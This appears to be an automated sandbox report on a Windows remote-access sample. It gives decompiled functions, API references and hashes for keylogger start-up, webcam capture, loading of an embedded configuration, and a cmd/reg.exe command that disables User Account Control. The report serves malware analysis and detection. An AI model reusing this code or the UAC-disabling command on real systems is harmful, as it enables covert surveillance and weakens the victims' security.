[Info], xrefs: 00409402

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTime$Eventwsprintf
String ID: Online Keylogger Started$[Info]
API String ID: 3546759147-3401407043
Opcode ID: c33eb4240faf0f86eb9778156269051690524317534ddc2cfd41fbbcecfdff3d
Instruction ID: 8fb703469506888dfee9d4bbb0c2098ebf9b351c4befbe7097037b3d6031c6da
Opcode Fuzzy Hash: c33eb4240faf0f86eb9778156269051690524317534ddc2cfd41fbbcecfdff3d
Instruction Fuzzy Hash: 0101A591A003183AD62076765D8BD7F7A5DCA82398F80447FFA81322C3D97D5D0982FA

Uniqueness

Uniqueness Score: -1.00%

Function 00418732, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57
registryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00418732() {
				char _v20;
				struct _WNDCLASSEXA _v68;
				void* __edi;
				struct HWND__* _t20;
				void* _t23;

				E00431810(_t23,  &(_v68.style), 0, 0x2c);
				_v68.cbSize = 0x30;
				_v68.style = 0;
				_v68.lpfnWndProc = E004187B2;
				_v68.cbClsExtra = 0;
				asm("movsd");
				_v68.lpszClassName =  &_v20;
				_v68.cbWndExtra = 0;
				asm("movsd");
				_v68.lpszMenuName = 0;
				asm("movsd");
				asm("movsw");
				asm("movsb");
				if(RegisterClassExA( &_v68) == 0) {
					L3:
					return 0;
				}
				_t20 = CreateWindowExA(0,  &_v20, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, 0, 0);
				if(_t20 == 0) {
					GetLastError();
					goto L3;
				}
				return _t20;
			}

APIs

RegisterClassExA.USER32(00000030), ref: 0041877E
CreateWindowExA.USER32 ref: 00418799
GetLastError.KERNEL32 ref: 004187A3

Strings

MsgWindowClass, xrefs: 00418749
0, xrefs: 0041874E

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: ClassCreateErrorLastRegisterWindow
String ID: 0$MsgWindowClass
API String ID: 2877667751-2410386613
Opcode ID: aabe29d8945d597987256ed2f640e589badf12c9ea9fd14bed4f02890446ac43
Instruction ID: 39839075c33bffd586aacb37a79c17ebe23a35f30f2176b7e199aa3a0e24e00b
Opcode Fuzzy Hash: aabe29d8945d597987256ed2f640e589badf12c9ea9fd14bed4f02890446ac43
Instruction Fuzzy Hash: 150125B5D0021CABDB00DFE5DC849EFBBBCFB04395F50493AF814A6240EB749A058AA4

Uniqueness

Uniqueness Score: -1.00%

Function 00432621, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 19%

			E00432621(void* __ebx, void* __edx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __ebp;
				intOrPtr _t24;
				void* _t26;
				void* _t27;
				void* _t28;
				intOrPtr _t29;
				intOrPtr* _t31;
				void* _t33;

				_t28 = __edx;
				_t26 = __ebx;
				_t35 = _a28;
				_t29 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t29);
					_t5 =  &_a4; // 0x432a4d
					_push( *_t5);
					E00432C70(_t35);
					_t33 = _t33 + 0x10;
				}
				_t36 = _a40;
				_t7 =  &_a4; // 0x432a4d
				_push( *_t7);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t29);
				}
				E00431BFB(_t27);
				_t31 = _a32;
				_push( *_t31);
				_push(_a20);
				_push(_a16);
				_push(_t29);
				L00432E72(_t26, _t27, _t28, _t29, _t36);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t31 + 4)) + 1;
				_t24 = _a24;
				_push( *((intOrPtr*)(_t24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t29);
				_push(_a4);
				"j8h8~F"();
				if(_t24 != 0) {
					E00431BC9(_t24, _t29);
					return _t24;
				}
				return _t24;
			}

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00432638

Part of subcall function 00432C70: ___AdjustPointer.LIBCMT ref: 00432CBA

_UnwindNestedFrames.LIBCMT ref: 0043264F
___FrameUnwindToState.LIBVCRUNTIME ref: 00432661
CallCatchBlock.LIBVCRUNTIME ref: 00432685

Strings

M*C, xrefs: 00432644, 00432635

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID: M*C
API String ID: 2633735394-129833859
Opcode ID: 94d24e599c38bfd0fe9448f4d259b7e070b739f8f5fce39f4dfa045fc21e001f
Instruction ID: 2b136e0aa6985e1208fe7cf03fe17269dead03c225157b686541d69b99605fa0
Opcode Fuzzy Hash: 94d24e599c38bfd0fe9448f4d259b7e070b739f8f5fce39f4dfa045fc21e001f
Instruction Fuzzy Hash: 5B016932000108BBCF126F56CD02EDA3BBAFF4D714F10501AF95861121C37AE861DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D797, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46
processCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040D797() {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v92;
				void* __edi;
				void* _t17;
				long _t19;

				_t19 = 0x44;
				E00431810(_t17,  &_v92, 0, _t19);
				_v92.cb = _t19;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v20);
				CloseHandle(_v20);
				return CloseHandle(_v20.hThread);
			}

0x0040d7a2
0x0040d7ab
0x0040d7b2
0x0040d7bb
0x0040d7bc
0x0040d7bd
0x0040d7be
0x0040d7db
0x0040d7ea
0x0040d7f7

APIs

CreateProcessA.KERNEL32 ref: 0040D7DB
CloseHandle.KERNEL32(0040C964), ref: 0040D7EA
CloseHandle.KERNEL32(00000027), ref: 0040D7EF

Strings

C:\Windows\System32\cmd.exe, xrefs: 0040D7D6
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040D7D1

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
API String ID: 2922976086-4183131282
Opcode ID: 97c280bce6da9a9ad1c74c6fab7c90947e3a5789ca2bb85f2e0812a43c64eebe
Instruction ID: 787108f511e4318509bc76900ce72c09bd06e2e4a50587c84678304a4fe04e77
Opcode Fuzzy Hash: 97c280bce6da9a9ad1c74c6fab7c90947e3a5789ca2bb85f2e0812a43c64eebe
Instruction Fuzzy Hash: 3FF096B290022C7EEB009BE9DC85EEFBF7CEB44795F000436F604E6020D5705D148BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405165, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00405165(void* __ecx, void* __edi) {
				void* __ebx;
				long _t19;
				intOrPtr _t28;
				void* _t29;
				void* _t30;
				void* _t31;
				intOrPtr _t38;

				_t29 = __edi;
				_t30 = __ecx;
				 *((intOrPtr*)(__ecx + 0x60)) = 0;
				if( *((intOrPtr*)(__ecx + 0x5c)) <= 0) {
					L3:
					 *((char*)(_t30 + 0x50)) = 0;
					_t38 =  *0x46bb07; // 0x0
					if(_t38 != 0) {
						_t32 = _t31 - 0x18;
						E00402064(0, _t31 - 0x18, "Connection timeout");
						E00402064(0, _t32 - 0x18, "[WARNING]");
						E004165D8(0, _t29);
					}
					L00404DD5(_t30);
					return 1;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t19 = WaitForSingleObject( *(_t30 + 0x54), 0x3e8);
					 *((intOrPtr*)(_t30 + 0x60)) =  *((intOrPtr*)(_t30 + 0x60)) + 1;
					_t28 =  *((intOrPtr*)(_t30 + 0x60));
					if(_t19 == 0) {
						break;
					}
					if(_t28 <  *((intOrPtr*)(_t30 + 0x5c))) {
						continue;
					}
					goto L3;
				}
				CloseHandle( *(_t30 + 0x54));
				 *(_t30 + 0x54) = 0;
				 *((char*)(_t30 + 0x50)) = 0;
				SetEvent( *(_t30 + 0x58));
				return 0;
			}

APIs

WaitForSingleObject.KERNEL32(?,000003E8,?,?,00405160), ref: 0040517B
CloseHandle.KERNEL32(?), ref: 004051D1
SetEvent.KERNEL32(?), ref: 004051E0

Strings

Connection timeout, xrefs: 004051A0
[WARNING], xrefs: 004051AF

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: CloseEventHandleObjectSingleWait
String ID: Connection timeout$[WARNING]
API String ID: 2055531096-1470507543
Opcode ID: 878cdf7f212794c94f489166eab776e44960996326cc9d1c6d2bc6825e958f7a
Instruction ID: ae60f77654cc690ea069452027dfbba6838492d045179776455cce24e18ac643
Opcode Fuzzy Hash: 878cdf7f212794c94f489166eab776e44960996326cc9d1c6d2bc6825e958f7a
Instruction Fuzzy Hash: C301D431A04F40AFC725BF35895651BBFA1EF0134A740083EE48396AA2CBB99408CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00410420, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410420(char* __edx, char* _a4, char* _a8, int _a12, intOrPtr _a16, char _a20) {
				void* _v12;
				char _v1040;
				long _t17;

				if(RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v12) != 0) {
					L3:
					return 0;
				}
				_t17 = RegQueryValueExA(_v12, _a4, 0, 0, _a8,  &_a12);
				RegCloseKey(_v12);
				if(_t17 != 0) {
					goto L3;
				}
				_t7 =  &_a20; // 0x40607d
				E00405A2F( &_v1040, _a16,  *_t7);
				E00405AB6( &_v1040, _a8, _a12);
				return 1;
			}

0x00410444
0x00410490
0x00000000
0x00410490
0x00410455
0x00410460
0x00410468
0x00000000
0x00000000
0x0041046a
0x00410476
0x00410487
0x00000000

APIs

RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 0041043C
RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 00410455
RegCloseKey.ADVAPI32(00000000), ref: 00410460

Strings

origmsc, xrefs: 0041042C
}`@, xrefs: 0041046A

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: origmsc$}`@
API String ID: 3677997916-2850336352
Opcode ID: 051950a050be9901e3d87e5ef00e9a8106184ddbf67cb3b65e55d040501c847b
Instruction ID: ecacb93a6b8b5b9c49bbf3e02a5795d497c0a97730d5bb5037d868723a18005e
Opcode Fuzzy Hash: 051950a050be9901e3d87e5ef00e9a8106184ddbf67cb3b65e55d040501c847b
Instruction Fuzzy Hash: CF014B31900229BFCF219F91DC45EEB7F38EF05755F004165BE0862161E6358AA5DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040BBAE, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040BBAE(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v16;
				signed int _t34;
				signed int* _t49;
				signed int* _t57;
				void* _t65;
				signed int* _t66;

				_t65 = __ecx;
				E0042F975(__ecx, 0);
				E0040D845(__ecx + 4);
				E0040D845(__ecx + 0xc);
				E0040D82F(__ecx + 0x14);
				E0040D82F(__ecx + 0x1c);
				E0040D845(__ecx + 0x24);
				E0040D845(__ecx + 0x2c);
				_t76 = _a4;
				if(_a4 == 0) {
					_t49 =  &_v16;
					E0040BB53(_t49, "bad locale name");
					E0043196A( &_v16, 0x4685d0);
					asm("int3");
					_push(_t65);
					_t66 = _t49;
					L0042FD08(_t66);
					E0040D82A( &(_t66[0xb]));
					E0040D82A( &(_t66[9]));
					E0040D82A( &(_t66[7]));
					E0040D82A( &(_t66[5]));
					E0040D82A( &(_t66[3]));
					E0040D82A( &(_t66[1]));
					_t57 = _t66;
					_t34 =  *_t57;
					__eflags = _t34;
					if(_t34 == 0) {
						return L0043DDB6(4);
					} else {
						__eflags = _t34 - 8;
						if(_t34 < 8) {
							_t37 = 0x46b050 + _t34 * 0x18;
							__eflags = 0x46b050 + _t34 * 0x18;
							return E0043021A(0x46b050 + _t34 * 0x18, _t37);
						}
						return _t34;
					}
				} else {
					E0042FCBD(__ebx, __edx, __edi, _t76, __ecx, _a4);
					return _t65;
				}
			}

0x0040bbb7
0x0040bbb9
0x0040bbc1
0x0040bbc9
0x0040bbd1
0x0040bbd9
0x0040bbe1
0x0040bbe9
0x0040bbee
0x0040bbf2
0x0040bc0d
0x0040bc10
0x0040bc1e
0x0040bc23
0x0040bc24
0x0040bc25
0x0040bc28
0x0040bc31
0x0040bc39
0x0040bc41
0x0040bc49
0x0040bc51
0x0040bc59
0x0040bc5e
0x0042f9cd
0x0042f9cf
0x0042f9d1
0x0043ddde
0x0042f9d7
0x0042f9d7
0x0042f9da
0x0042f9df
0x0042f9df
0x00000000
0x0042f9ea
0x0042f9eb
0x0042f9eb
0x0040bbf4
0x0040bbf8
0x0040bc05
0x0040bc05

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040BBB9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BBF8

Part of subcall function 0042FCBD: _Yarn.LIBCPMT ref: 0042FCDC
Part of subcall function 0042FCBD: _Yarn.LIBCPMT ref: 0042FD00

std::bad_exception::bad_exception.LIBCMT ref: 0040BC10
__CxxThrowException@8.LIBVCRUNTIME ref: 0040BC1E

Strings

bad locale name, xrefs: 0040BC08

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::bad_exception::bad_exception
String ID: bad locale name
API String ID: 3706160523-1405518554
Opcode ID: 5be82db9c01d23cd76aeaae8842cf35bf075d68d0fa216105b00094d7fe03fbf
Instruction ID: 41dab16569ba0838a92a141ebfa93a63ef7fcff5c20c22a6fe54fc1b43157858
Opcode Fuzzy Hash: 5be82db9c01d23cd76aeaae8842cf35bf075d68d0fa216105b00094d7fe03fbf
Instruction Fuzzy Hash: DAF03132900608ABE324FBA2E852E9E73B49F14714F50C57FB516225D1AF78A60CC69D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D41E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D41E(void** __ecx) {
				void* _t3;
				long _t4;
				void** _t5;
				struct HRSRC__* _t7;

				_t5 = __ecx;
				_t7 = FindResourceA(0, "SETTINGS", 0xa);
				_t3 = LockResource(LoadResource(0, _t7));
				_t4 = SizeofResource(0, _t7);
				 *_t5 = _t3;
				return _t4;
			}

0x0040d42a
0x0040d432
0x0040d43e
0x0040d449
0x0040d450
0x0040d454

APIs

FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 0040D42C
LoadResource.KERNEL32(00000000,00000000,?,?,?,0040CFD9), ref: 0040D437
LockResource.KERNEL32(00000000,?,?,?,0040CFD9), ref: 0040D43E
SizeofResource.KERNEL32(00000000,00000000,?,?,?,0040CFD9), ref: 0040D449

Strings

SETTINGS, xrefs: 0040D423

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SETTINGS
API String ID: 3473537107-594951305
Opcode ID: c908c3803409cf7171344093e449dd1e134e4aad92bc91585c3c664446313f73
Instruction ID: 24a513b8d2ab5e094724d90079fe90a958381d8b28c7bf08dd7741c770137eef
Opcode Fuzzy Hash: c908c3803409cf7171344093e449dd1e134e4aad92bc91585c3c664446313f73
Instruction Fuzzy Hash: A3E0EC72740350BBD6201BA16C5DF4B6A68DB85FA3F000465F601CA1D5CAB5C9008B65

Uniqueness

Uniqueness Score: -1.00%

Function 00404466, Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 201
sleepCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00404466(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, char** _a8, signed int _a12) {
				char _v8;
				void* _v40;
				char _v44;
				char _v52;
				char _v60;
				char _v76;
				void* __esi;
				void* __ebp;
				void* _t25;
				char** _t27;
				intOrPtr* _t29;
				intOrPtr _t45;
				signed int _t54;
				signed int _t56;
				char* _t59;
				void* _t63;
				signed int _t64;
				void* _t66;
				signed int _t75;
				void* _t78;
				void* _t124;
				signed int _t126;
				signed int _t127;
				signed int _t128;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				signed int _t135;
				void* _t138;
				void* _t139;
				intOrPtr* _t140;

				_push(__edi);
				_t120 = _a8;
				_t124 = __ecx;
				_t25 = E004027BA(__ecx, _a8);
				_t78 = _t124;
				_t146 = _t25;
				if(_t25 == 0) {
					_push(__ebx);
					E00402899(_t78, __edx, 0);
					_t27 = E0040221F();
					_t75 = _a12;
					_a8 = _t27;
					_t115 =  *_t27;
					__eflags =  !_t115 - _t75;
					if( !_t115 <= _t75) {
						E004028B8(_t124);
						asm("int3");
						_push(_t124);
						_t29 = L00401F75( &_v8);
						E00404286( &_v8,  &_v44, 4, 0xffffffff);
						_t138 = (_t135 & 0xfffffff8) - 0xc;
						E004020CC(_t75, _t138, _t115, __eflags, 0x46c238);
						_t139 = _t138 - 0x18;
						E004020CC(_t75, _t139, _t115, __eflags,  &_v60);
						E00416DD0( &_v76, _t115);
						_t140 = _t139 + 0x30;
						_t126 =  *_t29 - 0x3c;
						__eflags = _t126;
						if(__eflags == 0) {
							_t127 = E0040A15B(L00401F75(L00401E29( &_v52, _t115, __eflags, 0)));
							__eflags = _t127;
							if(_t127 != 0) {
								 *0x46bac4 = E0040A1B1(_t127, "OpenCamera");
								 *0x46bac0 = E0040A1B1(_t127, "CloseCamera");
								_t45 = E0040A1B1(_t127, "GetFrame");
								_t115 = "FreeFrame";
								 *0x46bac8 = _t45;
								 *0x46babc = E0040A1B1(_t127, "FreeFrame");
								 *0x46baaa = 1;
								E004020CC(_t75, _t140 - 0x18, "FreeFrame", __eflags, 0x46c1b8);
								_push(0x1b);
								goto L23;
							}
						} else {
							_t128 = _t126 - 1;
							__eflags = _t128;
							if(_t128 == 0) {
								__eflags =  *0x46ba77;
								if(__eflags != 0) {
									goto L20;
								}
							} else {
								_t129 = _t128 - 1;
								__eflags = _t129;
								if(_t129 == 0) {
									 *0x46bac0();
									 *0x46ba77 = 0;
								} else {
									_t130 = _t129 - 1;
									__eflags = _t130;
									if(_t130 == 0) {
										_t54 =  *0x46bac4();
										 *0x46ba77 = _t54;
										__eflags = _t54;
										if(__eflags == 0) {
											goto L15;
										} else {
											L20:
											_t115 = E00436079(_t49, L00401F75(L00401E29( &_v52, _t115, __eflags, 0)));
											E004046E8(_a4, _t51, __eflags);
										}
									} else {
										_t131 = _t130 - 1;
										__eflags = _t131;
										if(_t131 == 0) {
											_t56 =  *0x46bac4();
											 *0x46ba77 = _t56;
											__eflags = _t56;
											if(__eflags == 0) {
												L15:
												E004020CC(_t75, _t140 - 0x18, _t115, __eflags, 0x46c1b8);
												_push(0x41);
												L23:
												E00404A6E(_t75, _a4, _t115, __eflags);
											} else {
												_t59 = E00436079(_t57, L00401F75(L00401E29( &_v52, _t115, __eflags, _t131)));
												 *_t140 = 0x3e8;
												Sleep(??);
												_t115 = _t59;
												E004046E8(_a4, _t59, __eflags);
												 *0x46bac0();
											}
										}
									}
								}
							}
						}
						L00401E54( &_v52, _t115);
						L00401FA7();
						L00401FA7();
						__eflags = 0;
						return 0;
					} else {
						_t62 =  &(_t115[_t75]);
						_a12 =  &(_t115[_t75]);
						__eflags = _t75;
						if(__eflags != 0) {
							_push(0);
							_t64 = E004027F5(_t75, _t124, _t115, _t120, __eflags, _t62);
							__eflags = _t64;
							if(_t64 != 0) {
								_push( *_a8);
								_t66 = E00402209(_t124);
								E0040157F(E00402209(_t124) + _t75 * 2, _t66);
								_push(_t75);
								E0040156B(E00402209(_t124), _t120);
								E00402868(_a12);
							}
						}
						_t63 = _t124;
						goto L7;
					}
				} else {
					_t63 = E0040359F(__ebx, _t124, __edx, _t120 - E00402209(_t78) >> 1, _t124, _t146, _t78, _t124, _t120 - E00402209(_t78) >> 1, _a12);
					L7:
					return _t63;
				}
			}

APIs

Sleep.KERNEL32(00000000,?), ref: 004045BB

Part of subcall function 004046E8: __EH_prolog.LIBCMT ref: 004046ED

Strings

FreeFrame, xrefs: 00404691
CloseCamera, xrefs: 0040466F
GetFrame, xrefs: 00404680
OpenCamera, xrefs: 00404663

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: H_prologSleep
String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
API String ID: 3469354165-3547787478
Opcode ID: 67c791f5fdd525733876e842383bd144babde7886af9c98bfdf1ac9ac3771047
Instruction ID: 5a17ec9c29155d9da4fdaf8b9e23beca59789b2fbc5ce9981412f47b601f43b7
Opcode Fuzzy Hash: 67c791f5fdd525733876e842383bd144babde7886af9c98bfdf1ac9ac3771047
Instruction Fuzzy Hash: 5851E4B1604211ABCA04BB76DC5AA6E3B559BC1708F00053FF905AB7E2EF7D890587DE

Uniqueness

Uniqueness Score: -1.00%

Function 00441AE1, Relevance: 7.7, APIs: 5, Instructions: 171
timeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00441AE1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v56;
				char _v268;
				intOrPtr _v272;
				char _v276;
				char _v312;
				char _v316;
				void* __ebp;
				void* _t36;
				signed int _t38;
				signed int _t42;
				signed int _t50;
				void* _t54;
				void* _t56;
				signed int* _t61;
				intOrPtr _t71;
				void* _t78;
				signed int _t85;
				signed int _t87;
				signed int _t89;
				int _t93;
				char** _t96;
				signed int _t100;
				signed int _t101;
				signed int _t106;
				signed int _t107;
				intOrPtr _t116;
				intOrPtr _t118;

				_t88 = __edi;
				_t96 = E0044154B();
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t36 = E004415A9( &_v8);
				_pop(_t78);
				if(_t36 != 0) {
					L19:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0043629A();
					asm("int3");
					_t106 = _t107;
					_t38 =  *0x46a00c; // 0x3dad585e
					_v56 = _t38 ^ _t106;
					 *0x46a344 =  *0x46a344 | 0xffffffff;
					 *0x46a338 =  *0x46a338 | 0xffffffff;
					_push(0);
					_push(_t96);
					_t77 = "TZ";
					_t89 = 0;
					 *0x46b748 = 0;
					_t42 = E004391A5(__eflags,  &_v316,  &_v312, 0x100, "TZ");
					__eflags = _t42;
					if(_t42 != 0) {
						__eflags = _t42 - 0x22;
						if(_t42 == 0x22) {
							_t101 = E0043E61D(_t78, _v272);
							__eflags = _t101;
							if(__eflags != 0) {
								_t50 = E004391A5(__eflags,  &_v276, _t101, _v272, _t77);
								__eflags = _t50;
								if(_t50 == 0) {
									L0043EE85(0);
									_t89 = _t101;
								} else {
									_push(_t101);
									goto L25;
								}
							} else {
								_push(0);
								L25:
								L0043EE85();
							}
						}
					} else {
						_t89 =  &_v268;
					}
					asm("sbb esi, esi");
					_t100 =  ~(_t89 -  &_v268) & _t89;
					__eflags = _t89;
					if(__eflags == 0) {
						L33:
						E00441AE1(_t77, _t89, _t100, __eflags);
					} else {
						__eflags =  *_t89;
						if(__eflags == 0) {
							goto L33;
						} else {
							_push(_t89);
							E0044190C(_t77, _t89, _t100, __eflags);
						}
					}
					L0043EE85(_t100);
					__eflags = _v12 ^ _t106;
					return E0042F61B(_v12 ^ _t106);
				} else {
					_t54 = E00441551( &_v12);
					_pop(_t78);
					if(_t54 != 0) {
						goto L19;
					} else {
						_t56 = E0044157D( &_v16);
						_pop(_t78);
						if(_t56 != 0) {
							goto L19;
						} else {
							L0043EE85( *0x46b740);
							 *0x46b740 = 0;
							 *_t107 = 0x46b750;
							if(GetTimeZoneInformation(??) != 0xffffffff) {
								_t85 =  *0x46b750 * 0x3c;
								_t87 =  *0x46b7a4; // 0x0
								_push(__edi);
								 *0x46b748 = 1;
								_v8 = _t85;
								_t116 =  *0x46b796; // 0x0
								if(_t116 != 0) {
									_v8 = _t85 + _t87 * 0x3c;
								}
								_t118 =  *0x46b7ea; // 0x0
								if(_t118 == 0) {
									L9:
									_v12 = 0;
									_v16 = 0;
								} else {
									_t71 =  *0x46b7f8; // 0x0
									if(_t71 == 0) {
										goto L9;
									} else {
										_v12 = 1;
										_v16 = (_t71 - _t87) * 0x3c;
									}
								}
								_t93 = E0043E1EC(0, _t87);
								if(WideCharToMultiByte(_t93, 0, 0x46b754, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *( *_t96) = 0;
								} else {
									( *_t96)[0x3f] = 0;
								}
								if(WideCharToMultiByte(_t93, 0, 0x46b7a8, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *(_t96[1]) = 0;
								} else {
									_t96[1][0x3f] = 0;
								}
							}
							 *(E00441545()) = _v8;
							 *(E00441539()) = _v12;
							_t61 = E0044153F();
							 *_t61 = _v16;
							return _t61;
						}
					}
				}
			}

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045912C), ref: 00441B4B
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B754,000000FF,00000000,0000003F,00000000,?,?), ref: 00441BC3
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B7A8,000000FF,?,0000003F,00000000,?), ref: 00441BF0
_free.LIBCMT ref: 00441B39

Part of subcall function 0043EE85: HeapFree.KERNEL32(00000000,00000000,?,00447A9F,?,00000000,?,00000000,?,00447D43,?,00000007,?,?,0044828E,?), ref: 0043EE9B
Part of subcall function 0043EE85: GetLastError.KERNEL32(?,?,00447A9F,?,00000000,?,00000000,?,00447D43,?,00000007,?,?,0044828E,?,?), ref: 0043EEAD

_free.LIBCMT ref: 00441D05

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 3929a0d67aaa716754734b495f110d19b0b6549c1295d5d32f2fd139f409bd66
Instruction ID: 72a7bbd3543858052ef4a8e776e9b52013f5e56b1ee86729b2dafd24fcd61b93
Opcode Fuzzy Hash: 3929a0d67aaa716754734b495f110d19b0b6549c1295d5d32f2fd139f409bd66
Instruction Fuzzy Hash: 5051EA71900219AFEB10DF66DC819AA7BBCEF80315F10426BE411D32A1EB789DC1CB59

Uniqueness

Uniqueness Score: -1.00%

